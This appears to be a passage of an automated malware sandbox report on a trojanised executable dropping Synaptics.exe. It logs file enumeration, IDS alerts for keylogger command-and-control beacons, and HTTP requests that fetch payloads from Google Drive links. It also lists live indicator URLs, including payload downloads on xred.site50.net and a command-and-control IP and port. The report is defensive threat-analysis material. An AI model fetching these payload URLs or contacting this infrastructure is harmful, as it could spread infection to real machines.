                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_002324A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_002324A9
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_00226B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,10_2_00226B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_00226E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,10_2_00226E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0022F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0022F350
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0022FD47 FindFirstFileW,FindClose,10_2_0022FD47
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001FDD92 GetFileAttributesW,FindFirstFileW,FindClose,10_2_001FDD92
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0022FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0022FDD2
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: excel.exeMemory has grown: Private usage: 1MB later: 69MB

                              Networking

                              barindex
                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.8:49715 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.8:49727 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49727 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49742 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49743 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.8:49744 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49744 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49746 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49740 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49747 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49749 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.8:49752 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49752 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.8:49756 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49756 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49753 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49754 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49755 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49711 -> 172.217.16.206:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49717 -> 172.217.16.206:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49716 -> 172.217.16.206:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49723 -> 172.217.16.206:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49724 -> 172.217.16.206:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49712 -> 172.217.16.206:443
                              Source: Malware configuration extractorURLs: xred.mooo.com
                              Source: unknownDNS query: name: freedns.afraid.org
                              Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                              Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                              Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DE550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_00DE550C
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Ped9FFu77ZILljDRdPx4jmMXgH_9clhvCrKcOs0vHo5Wh5NQRqtD2bTclKsZHpXc_yNTCnedWDYMKz3uCDArCyXwnKDw6vH-8GIIWrExz2AkW205gWJXFurdY0IJGp63ZylB0bEx3aie6cdBXZS-_R3SSHM6X3X9WwZL56Wjt5UdLiU7-iFR_yg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=b1T8znPmh3zSMqQEaToyoyRR9X7BvTrQG4NcFjWxcs5T5xI3izk4l5pYgmo3LnBbUuh724lxK41R0ljONN_39-P4Okj2pNHYDUcv4mYcXn-23pqVqy7cjDrErXAy4iNrt2dW3TbnBbmAIj_7BLQGQmvnSpM5VdzQNxSbC-2fZwUqd-RZQ6y5YrY
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                              Source: global trafficDNS traffic detected: DNS query: docs.google.com
                              Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                              Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4mllYNGJPAIPIbtLCcv8_ugLJ2jVzO3XbiV-I7ETyrZ4MDatLmkmhrurGmooaW-etctaRYLXoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:34:31 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-SdsENuDFnIx-R_ESttZWeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=Ped9FFu77ZILljDRdPx4jmMXgH_9clhvCrKcOs0vHo5Wh5NQRqtD2bTclKsZHpXc_yNTCnedWDYMKz3uCDArCyXwnKDw6vH-8GIIWrExz2AkW205gWJXFurdY0IJGp63ZylB0bEx3aie6cdBXZS-_R3SSHM6X3X9WwZL56Wjt5UdLiU7-iFR_yg; expires=Tue, 01-Jul-2025 10:34:31 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Xd3_EMkfUx_20vx6MfwG2icaDFhALM4aQMyz5JJoKY2xxg-QTEFjY6pGG9gUooI2KuwvanQMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:34:31 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-5w9UjrPxoPLcZp8oVXg14w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=b1T8znPmh3zSMqQEaToyoyRR9X7BvTrQG4NcFjWxcs5T5xI3izk4l5pYgmo3LnBbUuh724lxK41R0ljONN_39-P4Okj2pNHYDUcv4mYcXn-23pqVqy7cjDrErXAy4iNrt2dW3TbnBbmAIj_7BLQGQmvnSpM5VdzQNxSbC-2fZwUqd-RZQ6y5YrY; expires=Tue, 01-Jul-2025 10:34:31 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5MOdsMS9KwVoKhp4-uobBjly47LrC_d_StgbXjCxzPyxTQOxbztRhPV1_lKpPb60sDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:34:38 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-rA1N6EBTeHmyzOzX0eCDyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7XEmoZLgH5Fm9-v4-H_mQ85b61KP1oWHkMlt2NEtwWau7v0JES7SD-mEsa4uX4fNRLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:34:38 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-l6_yqnUDhPkx2xJ1KyRNGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: ~$cache1.3.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                              Source: Synaptics.exe, 00000003.00000002.1610030732.000000000061A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc6135629787
                              Source: Synaptics.exe, 00000003.00000002.1610030732.000000000061A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978D
                              Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978x
                              Source: ._cache_FGNEBI.exe, 00000002.00000002.2668876953.000000000485E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/Brave-Browser
                              Source: Amcache.hve.15.drString found in binary or memory: http://upx.sf.net
                              Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlD
                              Source: ~$cache1.3.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                              Source: ~$cache1.3.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                              Source: ~$cache1.3.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                              Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarh
                              Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                              Source: Synaptics.exe, 00000003.00000002.1610030732.000000000064E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                              Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/Q
                              Source: Synaptics.exe, 00000003.00000002.1610030732.000000000064E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/X
                              Source: Synaptics.exe, 00000003.00000002.1610030732.000000000064E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/n
                              Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/p/cspreport
                              Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                              Source: ~$cache1.3.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000003.00000002.1611536905.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                              Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                              Source: ~$cache1.3.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                              Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                              Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%%
                              Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                              Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.00000000053D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                              Source: Synaptics.exe, 00000003.00000002.1610030732.000000000061A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1515835379.000000000542E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1%
                              Source: Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1516798933.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000003.00000002.1617542093.00000000053A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000003.00000003.1514607067.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000695000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1617542093.000000000542E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1515835379.000000000542E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
